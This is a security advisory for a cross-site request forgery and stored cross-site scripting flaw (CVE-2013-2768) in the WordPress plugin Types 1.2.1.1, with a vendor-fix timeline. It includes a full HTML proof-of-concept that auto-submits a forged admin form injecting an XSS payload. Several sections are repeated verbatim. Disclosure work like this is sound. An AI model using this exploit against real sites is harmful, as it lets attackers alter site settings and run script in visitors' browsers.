SSCHADV2013-005 - WordPress Plugin 'Types 1.2.1.1' Cross-Site Request Forgery & Stored Cross-site scripting vulnerability
Advisory:
|
WordPress Plugin ‘Types 1.2.1.1’ Cross-Site Request Forgery
& Stored Cross-site scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-005
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Types 1.2.1.1
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2013-2768
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The parameter ‘skypename’ of the WordPress plugin Types 1.2.1.1 is prone to a CSRF and stored XSS vulnerability
==============
PoC-Exploit
==============
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "180" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
pausecomp(pauses[i]);
}
}
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://[target]:80/wordpress/wp-admin/admin.php?page=wpcf-edit">
<input type="hidden" name="wpcf[group][name]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][supports][page]" value="page"/>
<input type="hidden" name="wpcf[group][taxonomies][category]1" value="1"/>
<input type="hidden" name="wpcf[group][filters_association]" value="any"/>
<input type="hidden" name="wpcf[group][conditional_display][relation]" value="AND"/>
<input type="hidden" name="wpcf[group][conditional_display][custom]" value=""/>
<input type="hidden" name="_wpcf_cd_count_8f4483265b96384425c4987b109ac977-1" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][name]" value="<body onload=alert(/xss/) />"/>
<input type="hidden" name="wpcf[fields][skype-286667805][slug]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][repetitive]" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][type]" value="skype"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][value]" value="true"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][message]" value="This Field is required"/>
<input type="hidden" name="wpcf[fields][skype-286667805][is_new]" value="1"/>
<input type="hidden" name="_wpnonce_wpcf" value="1da0e73f7d"/>
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/admin.php?page"/>
</form>
</body>
</html>
=====
Solution
=====
Upgrade to the latest version
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
PoC-Exploit
==============
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "180" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
pausecomp(pauses[i]);
}
}
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://[target]:80/wordpress/wp-admin/admin.php?page=wpcf-edit">
<input type="hidden" name="wpcf[group][name]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[group][supports][page]" value="page"/>
<input type="hidden" name="wpcf[group][taxonomies][category]1" value="1"/>
<input type="hidden" name="wpcf[group][filters_association]" value="any"/>
<input type="hidden" name="wpcf[group][conditional_display][relation]" value="AND"/>
<input type="hidden" name="wpcf[group][conditional_display][custom]" value=""/>
<input type="hidden" name="_wpcf_cd_count_8f4483265b96384425c4987b109ac977-1" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][name]" value="<body onload=alert(/xss/) />"/>
<input type="hidden" name="wpcf[fields][skype-286667805][slug]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][description]" value="custom-field-xss"/>
<input type="hidden" name="wpcf[fields][skype-286667805][repetitive]" value="0"/>
<input type="hidden" name="wpcf[fields][skype-286667805][type]" value="skype"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][value]" value="true"/>
<input type="hidden" name="wpcf[fields][skype-286667805][validate][required][message]" value="This Field is required"/>
<input type="hidden" name="wpcf[fields][skype-286667805][is_new]" value="1"/>
<input type="hidden" name="_wpnonce_wpcf" value="1da0e73f7d"/>
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/admin.php?page"/>
</form>
</body>
</html>
=====
Solution
=====
Upgrade to the latest version
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
04-Apr-2013 – fixed by developer
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
Comments
Display comments as Linear | Threaded